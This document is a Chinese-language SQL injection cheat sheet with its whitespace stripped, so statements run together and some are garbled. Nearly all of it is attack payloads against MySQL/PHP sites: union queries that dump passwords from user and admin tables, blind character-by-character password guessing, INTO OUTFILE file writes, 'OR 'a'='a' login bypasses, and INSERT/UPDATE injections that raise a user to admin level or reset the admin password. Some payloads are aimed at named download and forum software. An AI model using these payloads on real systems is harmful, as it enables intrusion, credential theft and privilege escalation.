'%23 'andpassWord='mypass id=-1unionselect1,1,1 id=-1unionselectchar(97),char(97),char(97) id=1unionselect1,1frommembers id=1unionselect1,1fromadmin id=1unionselect1,1fromuser userid=1andpassword=mypass userid=1andmid(password,3,1)=char(112) userid=1andmid(password,4,1)=char(97) andord(mid(password,1))>111(ord函数很好用,可以返回整形的) 'andLENGTH(password)='6(探测密码长度) 'andLEFT(password,1)='m 'andLEFT(password,2)='my …………………………依次类推 'unionselect1,username,passwordfromuser/ 'unionselect1,passwordfromuser/ ='unionselect1,passwordfromuser/(可以是1或者=后直接跟) 99999'unionselect1,passwordfromuser/ 'intooutfile'c:/file.txt(导出文件) ='or1=1intooutfile'c:/file.txt 1'unionselect1,passwordfromuserintooutfile'c:/user.txt selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt' id='unionselect1,passwordfromuserintooutfile id=-1unionselect1,database(),version()(灵活应用查询) 常用查询测试语句, selectFROMtablewhere1=1 selectFROMtablewhere'uuu'='uuu' selectFROMtablewhere1<>2 selectFROMtablewhere3>2 selectFROMtablewhere2<3 selectFROMtablewhere1 selectFROMtablewhere1+1 selectFROMtablewhere1--1 selectFROMtablewhereISNULL(NULL) selectFROMtablewhereISNULL(COT(0)) selectFROMtablewhere1ISNOTNULL selectFROMtablewhereNULLISNULL selectFROMtablewhere2BETWEEN1AND3 selectFROMtablewhere'b'BETWEEN'a'AND'c' selectFROMtablewhere2IN(0,2) selectFROMtablewhereCASEWHEN1>0THEN1END 例如:夜猫下载系统1.0版本 id=1unionselect1,1 unionselect1,1fromymdown_user unionselect1,1fromymdown_userwhereid=1 id=10000unionselect1,1fromymdown_userwhereid=1andgroupid=1 unionselect1,password,1fromymdown_userwhereid=1(替换,寻找密码) unionselect1,1fromymdown_userwhereid=1andord(mid(password,1))=49(验证第一位密码) unionselect1,2,1))=50(第二位) unionselect1,1))=51 ………………………………………………………… 例如2:灰色轨迹变换id进行测试(meteor) union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate union%20(select%20allowsmilies,pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate 构造语句: selectallowsmilies,eventdate,event,subjectFROMcalendar_eventswhereeventid=1union(select1,1fromuserwhereuserid=1) selectallowsmilies,passwordfromuserwhereuserid=1) union%20(select%201,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate union%20(select%201,12695,password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate union%20(select%201,userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate(查沙子的id) (selectaFROMtable_namewherea=10ANDB=1ORDERBYaLIMIT10) selectFROMarticlewherearticleid='$id'unionselectFROM……(字段和数据库相同情况下,可直接提交) selectFROMarticlewherearticleid='$id'unionselect1,1FROM……(不同的情况下) 特殊技巧:在表单,搜索引擎等地方写: "_" "." "% %'ORDERBYarticleid/ %'ORDERBYarticleid# 'ORDERBYarticleid/* 'ORDERBYarticleid# $command="dirc:\";system($command); selectFROMarticlewherearticleid='$id' selectFROMarticlewherearticleid=$id 1'and1=2unionselectfromuserwhereuserid=1/句中变为 (selectFROMarticlewherearticleid='1'and1=2unionselectfromuserwhereuserid=1/') 1and1=2unionselectfromuserwhereuserid=1 语句形式:建立一个库,插入: createDATABASEinjection
createTABLEuser
( userid
int(11)NOTNULLauto_increment,username
varchar(20)NOTNULLdefault'',password
varchar(20)NOTNULLdefault'',PRIMARYKEY(userid
) ); insertINTOuser
VALUES(1,'swap','mypass'); 插如一个注册用户: insertINTOuser
(userid,homepage,userlevel)VALUES('','$username','$password','$homepage','1'); "insertINTOmembres(login,nom,email,userlevel)VALUES('$login','$pass','$nom','$email','1')"; insertINTOmembres(login,'','3')#','1') "insertINTOmembresSETlogin='$login',password='$pass',nom='$nom',email='$email'"; insertINTOmembresSETlogin='',password='',nom='',userlevel='3',email='' "insertINTOmembresVALUES('$id','$login','1')"; updateuserSETpassword='$password',homepage='$homepage'whereid='$id' updateuserSETpassword='MD5(mypass)'whereusername='admin'#)',homepage='$homepage'whereid='$id' "updatemembresSETpassword='$pass',email='$email'whereid='$id'"; updatemembresSETpassword='[PASS]',email=''whereid='[ID]' "updatenewsSETVotes=Votes+1,score=score+$notewhereidnews='$id'"; 长用函数: DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() 比如: updatearticleSETtitle=$titlewherearticleid=1对应函数 updatearticleSETtitle=DATABASE()whereid=1 #把当前数据库名更新到title字段 updatearticleSETtitle=USER()whereid=1 #把当前MysqL用户名更新到title字段 updatearticleSETtitle=SYSTEM_USER()whereid=1 #把当前MysqL用户名更新到title字段 updatearticleSETtitle=SESSION_USER()whereid=1 #把当前MysqL用户名更新到title字段 updatearticleSETtitle=CURRENT_USER()whereid=1 #把当前会话被验证匹配的用户名更新到title字段 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: $req="selectFROMmembreswherenamelike'%$search%'ORDERBYname"; selectFROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname selectFROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname selectuidFROMadminswherelogin=''OR'a'='a'ANDpassword=''OR'a'='a'(经典) selectuidFROMadminswherelogin=''ORadmin_level=1#'ANDpassword='' selectFROMtablewheremsglike'%hop' selectuidFROMmembreswherelogin='Bob'ANDpasswordlike'a%'#'ANDpassword='' select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname